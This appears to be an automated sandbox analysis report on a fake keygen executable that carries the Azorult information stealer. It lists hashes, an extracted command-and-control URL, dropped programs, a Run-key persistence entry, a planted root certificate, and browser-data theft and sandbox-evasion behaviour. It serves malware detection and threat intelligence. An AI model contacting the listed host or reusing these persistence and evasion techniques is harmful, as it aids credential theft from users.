Analysis
-
max time kernel
37s -
max time network
88s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
26-03-2021 08:55
Static task
static1
Behavioral task
behavioral1
Sample
S.A.D.Formatwandler.360.keygen.by.Lz0.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
S.A.D.Formatwandler.360.keygen.by.Lz0.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
S.A.D.Formatwandler.360.keygen.by.Lz0.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
S.A.D.Formatwandler.360.keygen.by.Lz0.exe
Resource
win10v20201028
General
-
Target
S.A.D.Formatwandler.360.keygen.by.Lz0.exe
-
Size
5.2MB
-
MD5
d6b33a9f8b1600caa8b7ac88240e59e1
-
SHA1
19007187f24b11f922ed5ad8717c9e06f6452654
-
SHA256
3ee83cca83729705feabd39c7fd07a9f9f9de6a1847eea6f7ac645a60a643f85
-
SHA512
b8df0dbe55c0ed32639bab7af0a38077338b36fb4e4832d49e542cac9838f6359d3d0764cba4fcaa90ebb486e27efa8a461fe0fe637a94d0fa626a63847fcc04
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Executes dropped EXE 13 IoCs
pid Process 640 keygen-pr.exe 804 keygen-step-1.exe 400 keygen-step-3.exe 1128 keygen-step-4.exe 4460 key.exe 4456 Setup.exe 3208 multitimer.exe 3932 setups.exe 2692 askinstall20.exe 4644 setups.tmp 4400 multitimer.exe 2376 multitimer.exe 2928 md2_2efs.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 4644 setups.tmp 4644 setups.tmp 4644 setups.tmp 4644 setups.tmp 4644 setups.tmp 4644 setups.tmp 4644 setups.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\z041ny3pune = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\BP9P23CXDZ\\multitimer.exe\" 1 3.1616748977.605da1b1a6cea" multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 100 ipinfo.io 111 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 1 IoCs
pid Process 3008 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 8b8fbe611d22d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 4a1e4c611d22d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{6D60BDD0-0862-4051-8741-612031C9F4E0}" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000fd60dc89cdaf4b0fdbbe59fca69c0b20d5e0918b52809bbfd25d599004917f259e922d2622bab221b4c00f3f6b39c65e0a2bce595c4194cb4c3bf9bd7f98c284fa9d9cba3a39410bee620249f0f294ae8c1e0dd4d1066007120aa85018cc5e27f7217a3de14d52d69645f33e3ee98fe0095b2fcca8f1ec30cb698676624d1f4b9dbea6a2ec16af9eff09e926c63cc98f718031037021a7451afac66f0d3b0b8384140b257ab507c05c4ffdeb780d09b3ea2eae797db65897285c3d5136b68a795ac38f1a51481d5278b56ddab07a30fd0006c14d46d0f92eee2e62d74bde516f646b4d5c86f00df535dcf6461ba5ff0be8a6ba28c88e0b826b12394882d395973dac1f3c0ccec1ee9f6446b292ac466a61b05e3eaa12ba783ca77267fdb5d8400b268c0a3d008393a0ed5f390db1216014c28ada2b7b2dbfda8c6a75f1a407cc32793530a1a7dc0a9c17ec5f97d2c193827d9e8174e9306d11631c45e9c01c78d344becfabe33f515a832ce805317b782c82cc9d8d7beff879cb8a5ed0295df6ae29890059d55b9e5ccfa9c17bed898fb36f90bbbe53337ac937be5ee9d0669eb3f001b647ff MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{39334E21-3AF3-45EC-9683-6E4F3C59E7A9} = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 1c1b8a611d22d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "{9F227DB7-B01A-4FC9-8F02-61324BBE252C}" MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2756 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 113 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 102 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 38 IoCs
pid Process 4644 setups.tmp 4644 setups.tmp 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe 2376 multitimer.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1540 MicrosoftEdgeCP.exe 1540 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
